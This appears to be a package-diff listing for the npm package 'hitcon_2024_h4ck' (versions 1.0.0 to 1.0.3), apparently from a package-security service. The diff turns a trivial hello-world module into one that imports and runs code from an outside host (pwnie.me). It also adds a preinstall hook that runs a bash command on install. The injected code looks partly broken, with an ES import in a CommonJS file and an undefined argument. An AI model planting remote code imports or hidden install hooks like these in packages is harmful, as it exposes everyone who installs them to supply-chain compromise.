hitcon_2024_h4ck 1.0.0 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.
@@ -1,5 +1,8 @@
1
+ import {Test} from "https://38205e06.pwnie.me/aaa"
2
+
1
3
  function helloWorld() {
2
4
  console.log("Hello, world!");
5
+ Test(a);
3
6
  }
4
7
 
5
8
  module.exports = helloWorld;
package/package.json CHANGED
@@ -1,9 +1,10 @@
1
1
  {
2
2
  "name": "hitcon_2024_h4ck",
3
- "version": "1.0.0",
3
+ "version": "1.0.3",
4
4
  "description": "",
5
- "main": "index.js",
5
+ "main": "index.tsx",
6
6
  "scripts": {
7
+ "preinstall": "bash -c sleep 5000",
7
8
  "test": "echo \"Error: no test specified\" && exit 1"
8
9
  },
9
10
  "author": "",